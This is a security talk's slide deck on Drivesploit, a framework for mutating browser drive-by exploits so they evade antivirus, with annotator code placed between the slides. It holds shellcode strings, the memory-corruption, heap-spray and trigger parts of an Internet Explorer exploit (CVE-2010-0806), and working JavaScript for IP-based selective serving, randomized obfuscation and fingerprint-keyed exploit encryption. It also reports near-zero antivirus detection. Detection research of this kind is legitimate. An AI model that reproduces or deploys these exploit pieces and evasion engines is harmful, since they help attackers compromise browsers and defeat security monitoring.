CIRCUMVENTING AUTOMATED AND MANUAL DETECTION OF BROWSER EXPLOITS

Wayne Huang, Cofounder & CTO
Fyodor Yarochkin
Antonio Rohman Fernandez
Chris Hsiao
Armorize Technologies, Inc.
@waynehuang
wayne@armorize.com
Drive-by-Download Explained

Hackers distribute malware by "poisoning" legitimate websites.
Typical technique: inject malicious iframes into the HTML content.

Affected websites:
- Essentially become a delivery mechanism for malware
- Appear normal

Victims:
- Do not need to "click" or "agree to" anything
- Simply connecting to the website executes the attack

Examples of affected websites:
- CNN
- GameSpot
- US Treasury (http://thompson.blog.avg.com/2010/05/treasurywebsitehacked.html)
- PlayStation.com
- Washington Post
[Diagram: Page + Browser -> Exploit -> Payload = downloader; the exploit is served by the Exploit Server]

Injected script as seen in the wild (shellcode as a %u-escaped string; cut off on the slide):
<script>var sc=unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
Exploit!
[Diagram, built up over three slides: the Exploit Server serves exploits/droppers; the dropper executes and fetches Malware from the Malware Server; the malware then talks to the Controller]
But who would visit?

The key now is TRAFFIC.
[Diagram: URL Generators -> Landing Site -> Exploit Server (exploits/droppers) -> Malware Server (malware) -> Controller]
Where the traffic comes from:
- May-ongoing: DNF666 mass SQL injections
- May-June: shared hosting compromise (GoDaddy, RackSpace, Network Solutions, BlueHost, DreamHost)
- Continuous targeted attacks

[Diagram: URL Generators -> Landing Site -> Exploit Server (exploits/droppers) -> Malware Server (malware), with the three traffic sources feeding the landing site]
(2) Man-in-the-Middle

No tampering of the website itself; the exploit is injected into the traffic between the victim and the site:
- WAN
- LAN: ARP spoofing via ZXARPS and other tools

[Diagram: URL Generators -> Landing Site -> Exploit Server (exploits/droppers) -> Malware Server (malware), with the injection point on the WAN or LAN path rather than on the website]
LIVE DEMO 1

http://digg.com/software/Internet_Storm_Center_Diary_2010_02_27

Injected javascript in digg.com
MOTIVATION

We provide solutions that monitor websites and detect malicious content 24x7.
We use multiple behavior-, heuristic-, and signature-based technologies.

Most technologies are developed on our own, BUT we also integrate anti-virus, whose licenses are $expensive$.

We spend a lot of time testing our own technologies, and selecting anti-virus technologies.
The key question is: how good are we (and they) at detecting NEW drive-by downloads?

We need a good framework to help us replicate, manipulate, and mutate exploits found in the wild into NEW derivatives.
DRIVESPLOIT IS BORN, ON TOP OF METASPLOIT

INITIAL FINDINGS
- Antivirus capabilities differ greatly!
- Desktop and API versions differ greatly in performance
- Cost != performance
[Diagram, repeated over four slides: in the chain URL Generators -> Landing Site -> Exploits/droppers -> Exploit Server -> Malware -> Malware Server -> Controller, the URL generators, landing site and exploits/droppers are JAVASCRIPT, while the malware is a PE BINARY]

We will detect this part!! (the JavaScript part of the chain, which is what the rest of the talk is about)
THE TAO: ECMA-SCRIPTS
- JavaScript
- VBScript
- Adobe JS
- ActionScript
JAVASCRIPT!! (ECMA-SCRIPT)

[Diagram, built up over five slides: starting from the full chain (URL Generators -> Landing Site -> Exploits/droppers -> Exploit Server -> Malware -> Malware Server -> Controller), the Malware Server and then the Malware (the PE binary) are removed; the Exploit Server becomes Metasploit and the PAYLOAD becomes meterpreter (memory injection), so every stage a monitor sees is script and the payload stays in memory]
Drive-By wants to:
- Avoid detection at the victim's desktop
- Avoid detection by UTM/gateways
- Avoid detection by automated monitors
- Live for as long as possible

CONCLUSION:
- Reduce exposure: serve SELECTIVELY
- Avoid detection and analysis: mutate well

Serve Selectively

HTTP LEVEL: serve the exploit only to
- Fresh IPs (serve once per IP):
  set HTTP::client::onlyonce true
- Everyone except the black list
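The "serve selectively" policy above, written out as an added example (this is not Drivesploit's or Metasploit's code): a pure decision function a hypothetical exploit server would call per request, with the once-per-IP rule and a CIDR black list. The addresses in the sample log and black list are constructed documentation ranges, not real vendor or scanner addresses.

```javascript
// Added example (not Drivesploit's or Metasploit's code): the "serve selectively"
// gate as a pure function over IPv4 strings so it can be tested offline.
// Assumes a hypothetical server that calls decideToServe() for every request
// and keeps the gate object between requests.

// Parse a dotted IPv4 address into a 32-bit unsigned integer.
function ipv4ToInt(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some(p => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error('bad IPv4 address: ' + ip);
  }
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

// True when ip falls inside a CIDR block such as "198.51.100.0/24"
// (a bare address is treated as a /32).
function inCidr(ip, cidr) {
  const [base, bitsStr] = cidr.split('/');
  const bits = bitsStr === undefined ? 32 : Number(bitsStr);
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return (ipv4ToInt(ip) & mask) === (ipv4ToInt(base) & mask);
}

// Gate state: IPs already served (the "onlyonce" rule) and networks that are
// never served (constructed sample ranges).
function makeGate(blacklist) {
  return { served: new Set(), blacklist: blacklist.slice() };
}

// Decide what a request gets ('exploit' or 'benign') and why, recording the
// IP so the same client never receives the exploit twice.
function decideToServe(gate, ip) {
  if (gate.blacklist.some(cidr => inCidr(ip, cidr))) {
    return { serve: 'benign', reason: 'blacklisted' };
  }
  if (gate.served.has(ip)) {
    return { serve: 'benign', reason: 'already served' };
  }
  gate.served.add(ip);
  return { serve: 'exploit', reason: 'fresh ip' };
}

// Walk a constructed request log through the gate and return the decisions:
// a repeat visit from the same IP, a blacklisted /24 and a blacklisted /32 all
// get the benign page.
function runSampleLog() {
  const gate = makeGate(['198.51.100.0/24', '203.0.113.7']);
  const requests = ['192.0.2.10', '192.0.2.10', '198.51.100.42', '203.0.113.7', '192.0.2.11'];
  return requests.map(ip => decideToServe(gate, ip).serve);
}
```

The defender's reading of this gate: re-fetching a suspicious URL from the address that first saw it returns the clean page, so a monitor that confirms from the same egress IP will clear the site. Crawl from fresh addresses, and treat a page whose content changes between a first and second fetch as a signal in itself.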
SCRIPT MUTATION
- For the exploit
- For the payload
Anatomy of the exploit used as the running example (the slides label its four parts Shellcode, MCorrupt (memory corruption), Heapspray and Trigger):

Shellcode (a %u-escaped string; cut off on the slide):

<script>var shellraw =
"%u7679%u4673%u757b%u924e%u66b9%ub441%u018d%u7df9%u241c%ud631%u40b7%ueb11%u043d%ube97%u212c%u05e1%u8335%u42fc%ub893%u227f%u98d4%u484b%u8c90%u13e0%uf8d3%u7aba%u7278%u2034%u49f5%u259f%u9137%u339b%u1dd5%ub1b0%u3f99%u2f43%u3cb6%ub2a8%ub30c%u4714%u3d7b%ue138%uf803%u66b2%u97b9%u9335%u767a%ub805%ue201%u4a2f%u85a8%u7eeb%uf93b%u414f%u257d%u78bf%u2c43%u7f99%ubb2d%ub098%ub342%u918d%u3fb2%u704a%u7147%u7f74%u3073%u77f9%ubb40

MCorrupt (the IE userData behavior bug; the trailing brace suggests this is the body of bootstrapper(), which the Trigger below calls, but the opening line is not on the slide):

var j_object = document.createElement('body');
j_object.addBehavior('#default#userData');
document.appendChild(j_object);
try{
  for(counter=0;counter<10;counter++){
    j_object.setAttribute('s',window);
  }
}catch(e){}
window.status+='';
}

Heapspray (the slide reads "slackspace =0x86000 (shellcode.length*2)" with the operator lost; "-" is the only reading consistent with the rest, and memory[] must have been declared earlier, e.g. var memory = new Array(), which the slide does not show):

slackspace = 0x86000 - (shellcode.length*2);
var nops = unescape("%u0c0c%u0c0c");
while(nops.length<slackspace/2){ nops+=nops; }
var fillblock = nops.substring(0,slackspace/2);
delete nops;
for(counter=0;counter<270;counter++){
  memory[counter] = fillblock + fillblock + fillblock + shellcode;
}

Trigger (a hidden button whose onclick handler is fired programmatically):

<button id='j_id' onclick='bootstrapper();' style='display:none'></button>
document.getElementById('j_id').onclick();
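The byte-level view of the Heapspray part, as an added example that is not code from the slides or from Drivesploit; it runs in Node without a browser. Assumptions not taken from the page: spray strings are UTF-16 (two bytes per code unit), the sled byte is 0x0c because "0c 0c" decodes as the harmless x86 instruction "or al, 0x0c", and the per-allocation string header and slack that the slide's 0x86000 constant is tuned for are ignored. The "shellcode" is a constructed four-byte placeholder, not real shellcode.

```javascript
// Added example, not from the slides or Drivesploit: the arithmetic behind the
// Heapspray part above. Assumes UTF-16 strings (2 bytes per code unit) and
// ignores the real allocator header/slack that 0x86000 is tuned for.

// Encode raw bytes as the %uXXXX escapes that unescape() turns into UTF-16
// code units; the word is little-endian, so bytes 0x12,0x34 become %u3412.
function toUnicodeEscapes(bytes) {
  if (bytes.length % 2 !== 0) throw new Error('need an even number of bytes');
  let s = '';
  for (let i = 0; i < bytes.length; i += 2) {
    const word = bytes[i] | (bytes[i + 1] << 8);
    s += '%u' + word.toString(16).padStart(4, '0');
  }
  return s;
}

// Mirror what unescape() does for %uXXXX: one code unit per escape.
function fromUnicodeEscapes(s) {
  return s.replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Build one spray block the way the slide's loop does: double the nop string
// until it covers slackspace/2 code units, then sled + sled + sled + shellcode.
// Returns the block and the byte offset at which the shellcode starts.
function buildSprayBlock(shellcode, targetBytes) {
  const slackspace = targetBytes - shellcode.length * 2;
  let nops = fromUnicodeEscapes('%u0c0c%u0c0c');
  while (nops.length < slackspace / 2) nops += nops;
  const fillblock = nops.substring(0, slackspace / 2);
  return { block: fillblock + fillblock + fillblock + shellcode,
           shellcodeOffset: fillblock.length * 3 * 2 };
}

// The block as it sits in memory: UTF-16LE bytes.
function blockToBytes(block) {
  const out = new Uint8Array(block.length * 2);
  for (let i = 0; i < block.length; i++) {
    const c = block.charCodeAt(i);
    out[2 * i] = c & 0xff;
    out[2 * i + 1] = c >> 8;
  }
  return out;
}

// Simulate EIP landing at byteOffset inside the block: every "0c xx" pair is
// one two-byte "or al, xx" instruction, so execution advances two bytes at a
// time until the first opcode that is not 0x0c. Returns where it leaves the sled.
function sledWalk(bytes, byteOffset) {
  let pc = byteOffset;
  while (pc < bytes.length && bytes[pc] === 0x0c) pc += 2;
  return pc;
}

// Worked check on a constructed placeholder "shellcode" (two nops, two int3):
// an even landing offset reaches the shellcode start exactly, an odd one
// swallows the first shellcode byte as an immediate and lands one byte late,
// which is why a 0x0c0c0c0c sled only works when it is entered with the same
// parity as the shellcode.
function sprayAlignmentCheck() {
  const shellcode = fromUnicodeEscapes(toUnicodeEscapes([0x90, 0x90, 0xcc, 0xcc]));
  const { block, shellcodeOffset } = buildSprayBlock(shellcode, 0x1000);
  const bytes = blockToBytes(block);
  return {
    blockBytes: bytes.length,
    shellcodeOffset,
    evenLanding: sledWalk(bytes, 0x100) === shellcodeOffset,
    oddLanding: sledWalk(bytes, 0x101) === shellcodeOffset + 1,
  };
}
```

With a 0x1000-byte target and a 4-byte payload the block comes out at 12280 bytes with the shellcode at offset 12276, which also shows that the slide's "three fill blocks plus shellcode" shape makes each allocation roughly three times the slackspace rather than 0x86000 itself; the constant is chosen for the allocator, not for the block length.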
[Diagram, built up over several slides: the four parts (Shellcode, MCorrupt, Heapspray, Trigger) in their Primitive Form are packed into an OBFUSCATED BLOB, with a DE-OBFUSCATOR in front that unpacks it at run time to give the Obfuscated Form of the exploit. The generator's steps are labelled Start, Mutate (the primitive form) and Prevent (the trigger)]
MUTATION FEATURES IMPLEMENTED SO FAR

1. Chop strings into variables. The start of the shellcode, "%u7679%u4673%u757b%u924e", becomes:
   A1 = "%u7";
   A2 = "679%";
   A3 = "u4673%";
   A4 = "u75";
   A5 = "7%u92";
   A6 = "4e";

2. Shuffle the declaration order and rebuild by concatenation:
   A3 = "u4673%";
   A4 = "u75";
   A1 = "%u7";
   A5 = "7%u92";
   A2 = "679%";
   A6 = "4e";
   B1 = A1+A2;
   B2 = A3+A4;
   B3 = A5+A6;

3. Layer 2: shuffle the concatenation layer as well, so the same pieces are combined under different names and in a different order:
   B2 = A1+A2;
   B3 = A5+A6;
   B1 = A3+A4;

4. Replace numeric constants with equivalent arithmetic, e.g. the heap-spray constant 0x86000 (548864) becomes
   (246*2)+(5676*96)+(34*4)+8+(3332*1)
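The four mutation features above, implemented as an added example (this is not Drivesploit's code): strings are chopped into randomly named variables emitted in shuffled order, rebuilt through one or more shuffled concatenation layers, and integer constants are rewritten as sums of products in the shape of the slide's 0x86000 expression. The seeded PRNG and the name generator are this example's own choices; each mutated program is evaluated back and compared with the original value, which is the check a generator like this needs after every transformation.

```javascript
// Added example, not code from the slides or Drivesploit: a small mutation
// engine for "chop into random variables, shuffle, concatenate in layers,
// arithmetic constants". Seeded so a given seed reproduces the same output.

// mulberry32: small seeded PRNG returning floats in [0, 1).
function mulberry32(seed) {
  let a = seed >>> 0;
  return function () {
    a = (a + 0x6d2b79f5) >>> 0;
    let t = a;
    t = Math.imul(t ^ (t >>> 15), t | 1);
    t ^= t + Math.imul(t ^ (t >>> 7), t | 61);
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

function randInt(rng, lo, hi) {            // inclusive range
  return lo + Math.floor(rng() * (hi - lo + 1));
}

function shuffle(arr, rng) {               // Fisher-Yates, in place
  for (let i = arr.length - 1; i > 0; i--) {
    const j = randInt(rng, 0, i);
    [arr[i], arr[j]] = [arr[j], arr[i]];
  }
  return arr;
}

// Fresh identifiers that never collide within one mutated program.
function makeNameGen(rng) {
  const used = new Set();
  const letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
  return function () {
    for (;;) {
      let n = '_';
      const len = randInt(rng, 3, 8);
      for (let i = 0; i < len; i++) n += letters[randInt(rng, 0, letters.length - 1)];
      if (!used.has(n)) { used.add(n); return n; }
    }
  };
}

// Layer 1: chop the string into pieces of 1..6 characters, one variable each,
// declared in shuffled order. Each further layer concatenates the previous
// layer pairwise (again emitted shuffled) until one variable holds the string.
// Shuffling inside a layer is safe because a layer only reads the layer before it.
function mutateString(str, rng) {
  const fresh = makeNameGen(rng);
  const pieces = [];
  for (let i = 0; i < str.length;) {
    const len = randInt(rng, 1, 6);
    pieces.push(str.slice(i, i + len));
    i += len;
  }
  if (pieces.length === 0) pieces.push('');          // empty input still yields one variable
  const lines = [];
  const layer = pieces.map(p => {
    const name = fresh();
    return { name, decl: `var ${name} = ${JSON.stringify(p)};` };
  });
  shuffle(layer.slice(), rng).forEach(v => lines.push(v.decl));
  let names = layer.map(v => v.name);
  while (names.length > 1) {
    const next = [], decls = [];
    for (let i = 0; i < names.length; i += 2) {
      const name = fresh();
      const rhs = i + 1 < names.length ? `${names[i]} + ${names[i + 1]}` : names[i];
      decls.push(`var ${name} = ${rhs};`);
      next.push(name);
    }
    shuffle(decls, rng).forEach(d => lines.push(d));
    names = next;
  }
  return { source: lines.join('\n'), result: names[0] };
}

// Rewrite a non-negative integer as a sum of random products plus a remainder,
// e.g. 0x86000 -> (a*b)+(c*d)+(e*f)+(rest*1). Each product takes at most half
// of what is left, so the remainder never goes negative.
function mutateNumber(n, rng, terms = 4) {
  const parts = [];
  let rest = n;
  for (let i = 0; i < terms - 1 && rest > 1; i++) {
    const b = randInt(rng, 2, 99);
    const maxA = Math.floor(rest / (2 * b));
    if (maxA < 1) break;
    const a = randInt(rng, 1, maxA);
    parts.push(`(${a}*${b})`);
    rest -= a * b;
  }
  parts.push(`(${rest}*1)`);
  return parts.join('+');
}

// Evaluate a mutated program / expression to confirm it reconstructs the original.
function evalMutated(m) {
  return new Function(m.source + '\nreturn ' + m.result + ';')();
}
function evalExpr(expr) {
  return new Function('return ' + expr + ';')();
}
```

Two things worth noting from running it: the output for a given seed is deterministic, so a generator can log the seed instead of the whole program, and because the chop points and names change with the seed, no byte-level signature on the shellcode string survives, which is the effect the 17/42 to 0/42 numbers later in the deck measure.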
Trigger Prevention

[Diagram: the Primitive Form / Obfuscated Form pipeline again, with the Prevent step applied to the Trigger]

Trigger prevention techniques:
- <div onload ...>
- <img onload ...>
- var a=1; var b=0;
  do {
    useless code;
  } while (a==b);
- Fingerprinting-based encryption
TESTING IT OUT

Using the IE "peers" exploit as the example: CVE-2010-0806 (MS10-018)

PLAIN: 17/42
RANDVAR + CONCAT SC + INJECT SC: 11/42
Roughly 6 of the 17 anti-virus engines detect based on the shellcode (for this exploit)
RANDVAR + INJECT SC + CONCAT CODE: 0/42

Antivirus desktop versions are much stronger:
- Behavior analysis
- Buffer overflow behavior
- Download-to-file behavior
LIVE DEMO 2: DESKTOP ANTIVIRUS BYPASS

5. FINGERPRINTING-BASED ENCRYPTION
Browser fingerprinting checks (True/False per browser). The first column's header is missing on the slide; from the rows (canvas unsupported, getElementsByTagName returning comment nodes, named function expressions leaking) it is IE. Two row labels were lost on the slide and are marked as such.

Check                                           | IE    | FF    | Safari      | Opera | Chrome
(label lost)                                    | True  | True  | True        | False | True
String_prototype_replace_ignore_functions       | False | False | True(2.0.2) | False | False
Is_ES5_strict_mode_supported                    | False | False | False       | False | False
(label lost)                                    | False | True  | True        | True  | True
Getelementsbytagname_returns_comment_nodes      | True  | False | False       | False | False
Is_element_tagname_uppercased                   | True  | True  | True        | True  | True
Is_canvas_element_supported                     | False | True  | True        | True  | True
Is_DOMFocusIn_supported                         | False | False | True        | True  | True
Is_CSS_boder_radius_supported                   | False | True  | True        | False | True
Function_identified_leaks_onto_enclosing_scope  | True  | False | False       | False | False
Script_element_rejects_textnode_appending       | True  | False | False       | False | False
Is_contextmenu_event_supported                  | True  | True  | True        | False | True
Is_position_fixed_supported                     | False | True  | True        | False | True
Computed_style_return_static_positioned_element | False | False | False       | True  | False
5. Fingerprinting-Based Encryption: Summary

"This exploit works only for IE6."
"Give me an encrypted version of my javascript exploit."
"Give me javascript to generate the decoding key."
"The key is only correctly generated if the javascript is run under IE6."
5. Fingerprinting-Based Encryption: Summary

The key-generation script reads a subset of the fingerprinting checks into the key variables:

A=Check1();
B=Check3();
C=Check4();
D=Check6();
E=Check8();
F=Check9();
G=Check12();
H=Check14();

Each generated instance permutes which check feeds which variable, so both the decoder and the resulting key differ from instance to instance:

A=Check6();
B=Check12();
C=Check8();
D=Check1();
E=Check4();
F=Check14();
G=Check3();
H=Check9();
One-time key:
- Encrypt the javascript exploit
- Generate the decoding javascript

(you don't usually reuse them)
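The fingerprinting-based encryption flow from the last three slides (encrypt under the key the target browser will produce, emit decoder JavaScript that recomputes the key from the live checks in a per-instance order), as an added example that is not Drivesploit's code and that runs in Node. Assumptions not taken from the page: the browser quirk checks are passed in as an array of functions standing in for DOM checks like those in the table above, the key mixing is FNV-1a style and the cipher is an xorshift32 keystream (the talk does not say what Drivesploit uses), and the "exploit" is a harmless constructed script. The last function is the analyst's side: with n checks there are only 2^n possible keys, so the decoder can be brute-forced offline without the target browser.

```javascript
// Added example, not code from the slides or Drivesploit. Checks are supplied
// as functions (stand-ins for DOM quirks); key mixing and cipher are this
// example's own choices, and SAMPLE_EXPLOIT is a constructed harmless script.

// Seeded PRNG used both for the keystream and for shuffling the check order.
function xorshift32(seed) {
  let x = seed >>> 0;
  if (x === 0) x = 0x9e3779b9;            // xorshift must not start at zero
  return function () {
    x ^= x << 13; x >>>= 0;
    x ^= x >>> 17;
    x ^= x << 5;  x >>>= 0;
    return x;
  };
}

// Key from the ordered check results, mixed FNV-1a style so that a single
// wrong answer changes the whole key (distinct bit vectors give distinct keys).
function keyFromFingerprint(bits) {
  let k = 0x811c9dc5;
  for (let i = 0; i < bits.length; i++) {
    k ^= bits[i] ? 1 : 0;
    k = Math.imul(k, 0x01000193) >>> 0;
  }
  return k;
}

// XOR with the keystream; encryption and decryption are the same call.
function cryptBytes(bytes, key) {
  const next = xorshift32(key);
  const out = [];
  let word = 0;
  for (let i = 0; i < bytes.length; i++) {
    if (i % 4 === 0) word = next();
    out.push(bytes[i] ^ ((word >>> (8 * (i % 4))) & 0xff));
  }
  return out;
}

// Byte helpers kept free of Node-only APIs because they are inlined into the
// generated decoder; the exploit text is assumed to be ASCII.
function strToBytes(s) { const b = []; for (let i = 0; i < s.length; i++) b.push(s.charCodeAt(i) & 0xff); return b; }
function bytesToStr(b) { let s = ''; for (let i = 0; i < b.length; i++) s += String.fromCharCode(b[i]); return s; }
function bytesToHex(b) { return b.map(x => x.toString(16).padStart(2, '0')).join(''); }
function hexToBytes(h) { const b = []; for (let i = 0; i < h.length; i += 2) b.push(parseInt(h.slice(i, i + 2), 16)); return b; }

// Random permutation of 0..n-1 so each instance reads the checks in a
// different order, like the A=Check6(); B=Check12(); ... slide.
function shuffledOrder(n, rng) {
  const a = Array.from({ length: n }, (_, i) => i);
  for (let i = n - 1; i > 0; i--) { const j = rng() % (i + 1); [a[i], a[j]] = [a[j], a[i]]; }
  return a;
}

// Generation side: encrypt under the key the target browser is expected to
// produce and emit decoder JavaScript that recomputes it from the live checks.
// The decoder inlines the helpers above through Function.prototype.toString.
function buildInstance(exploitJs, expectedResults, seed) {
  const order = shuffledOrder(expectedResults.length, xorshift32(seed));
  const key = keyFromFingerprint(order.map(i => expectedResults[i]));
  const blob = bytesToHex(cryptBytes(strToBytes(exploitJs), key));
  const reads = order.map((idx, pos) => `var v${pos} = checks[${idx}]() ? 1 : 0;`);
  const decoder = [
    xorshift32.toString(), keyFromFingerprint.toString(), cryptBytes.toString(),
    bytesToStr.toString(), hexToBytes.toString(),
    ...reads,
    `var bits = [${order.map((_, pos) => 'v' + pos).join(', ')}];`,
    `return bytesToStr(cryptBytes(hexToBytes(${JSON.stringify(blob)}), keyFromFingerprint(bits)));`,
  ].join('\n');
  return { order, decoder };
}

// Victim side: run the decoder with whatever the current browser answers.
// The right browser gets the script back; any other gets bytes that do not parse.
function runDecoder(decoderSrc, checks) {
  return new Function('checks', decoderSrc)(checks);
}

// Analyst side: enumerate all 2^n check vectors and keep the one whose output
// contains a marker the exploit is known to carry.
function bruteForceDecoder(decoderSrc, n, marker) {
  for (let v = 0; v < (1 << n); v++) {
    const checks = Array.from({ length: n }, (_, i) => () => ((v >> i) & 1) === 1);
    const out = runDecoder(decoderSrc, checks);
    if (out.indexOf(marker) !== -1) return { vector: v, plaintext: out };
  }
  return null;
}

// Constructed stand-ins: a harmless script in place of the exploit, the quirk
// answers the target browser is assumed to give, and a browser differing on one.
const SAMPLE_EXPLOIT = 'var sc = unescape("%u9090%u9090"); document.title = sc;';
const IE6_RESULTS = [true, false, true, true, false, false, true, true];
const checksIE6 = IE6_RESULTS.map(v => () => v);
const checksOther = IE6_RESULTS.map((v, i) => () => (i === 2 ? !v : v));
```

The brute-force function is the caveat: the scheme keeps a JavaScript emulator or a non-target browser from ever seeing the exploit, but it does not hide it from an analyst willing to try every combination of the checks, and the number of checks, not the cipher, bounds that work. It also means the decoder's own check list is the fingerprint of what the exploit targets.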
Existing JavaScript packers / obfuscators:
- Google Closure Compiler: http://code.google.com/closure/compiler/
- http://www.creabit.com/htmlprotect/
- Dean Edwards Packer: http://dean.edwards.name/packer/
- Online JS Obfuscator: http://www.iwebtool.com/html_encrypter
- http://www.cha88.cn/safe/fromCharCode.php
OK, so AV doesn't work (that well). How about behavior-based approaches?

Behavior-based analyzers run the page's scripts in a JavaScript engine (SpiderMonkey, Rhino, JSUnpack and the like), so script that is not JavaScript is never executed by them:
- Exploits in VBScript
- URL generators in VBScript
- Exploits in / generated by VBScript may defeat SpiderMonkey et al. (Rhino, JSUnpack, etc.)
Future Work
- Randomly chop up scripts and split them into individual files
- Generating VBScript instead of JavaScript
- Encrypting using data existing outside of the HTML: HTTP headers
Discussion

The Panopticlick experiment by Eckersley of EFF: 94.2% of "typical desktop browsers" are unique.
THANK YOU!

wayne@armorize.com
@waynehuang
@drivesploit
http://www.drivesploit.org

Credits: Wayne Huang, Fyodor Yarochkin, Antonio Rohman Fernandez
References

- James Lee, Using guided missiles in drive-bys: automatic browser fingerprinting and exploitation with the Metasploit Framework's browser_autopwn. http://www.slideshare.net/egypt/using-guided-missiles-in-drivebys-automatic-browser-fingerprinting-and-exploitation-withthe-metasploit-frameworks-browser-autopwn
- 0-box analyzer: afterdark runtime forensics for automated malware analysis and clustering. http://www.slideshare.net/wayne_armorize/0-box-analyzerafterdark-runtime-forensics-for-automated-malware-analysis-and-clustering-2
- HeapLib support added to Metasploit 3. http://blog.metasploit.com/2007/04/heaplib-support-added-to-metasploit-3.html